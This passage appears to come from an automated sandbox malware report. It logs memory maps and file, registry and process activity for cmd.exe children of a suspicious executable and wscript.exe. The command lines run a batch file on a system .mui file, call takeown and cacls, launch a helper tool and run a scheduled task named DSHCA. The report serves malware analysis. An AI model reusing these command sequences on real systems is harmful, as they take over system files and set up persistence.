| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef10000 | 0x7ef10000 | 0x7f00ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f010000 | 0x7f010000 | 0x7f032fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f036000 | 0x7f036000 | 0x7f036fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f038000 | 0x7f038000 | 0x7f03afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f03b000 | 0x7f03b000 | 0x7f03dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f03e000 | 0x7f03e000 | 0x7f03efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #99: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #99 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc54 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C1C
0x
550
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000040000 | 0x00040000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x0004ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00061fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00063fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00083fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0470ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004610000 | 0x04610000 | 0x0470ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04710000 | 0x04a46fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e720000 | 0x7e720000 | 0x7e81ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e820000 | 0x7e820000 | 0x7e842fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e843000 | 0x7e843000 | 0x7e843fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e847000 | 0x7e847000 | 0x7e849fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e84a000 | 0x7e84a000 | 0x7e84cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e84d000 | 0x7e84d000 | 0x7e84dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xfc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x440, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x2c0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "jnwmon.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "jnwmon.dll.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #100: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #100 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "se-viii.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xec4 |
| Parent PID | 0xeb8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
528
0x
C74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x049effff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x04a0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049f0000 | 0x049f0000 | 0x049fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04a03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a13fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a20000 | 0x04a20000 | 0x04a33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04b7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b80000 | 0x04b80000 | 0x04b83fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b90000 | 0x04b90000 | 0x04b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04ba1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04bb0000 | 0x04c6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c70000 | 0x04c70000 | 0x04caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x051bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x051c0000 | 0x054f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9a0000 | 0x7e9a0000 | 0x7ea9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eaa0000 | 0x7eaa0000 | 0x7eac2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eac4000 | 0x7eac4000 | 0x7eac4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eac9000 | 0x7eac9000 | 0x7eac9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaca000 | 0x7eaca000 | 0x7eaccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eacd000 | 0x7eacd000 | 0x7eacffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xe94, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #102: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #102 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:15, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Self Terminated |
| Monitor Duration | 00:00:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x81c |
| Parent PID | 0x318 (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
554
0x
DE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000f40000 | 0x00f40000 | 0x04f3ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f40000 | 0x04f40000 | 0x04f4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f70000 | 0x04f70000 | 0x04f83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050d0000 | 0x050d0000 | 0x050d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050e0000 | 0x050e0000 | 0x050e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x050f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x0513ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005140000 | 0x05140000 | 0x0514ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x053effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05150000 | 0x0520dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005210000 | 0x05210000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052f0000 | 0x052f0000 | 0x053effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053f0000 | 0x053f0000 | 0x054effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x054f0000 | 0x05826fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
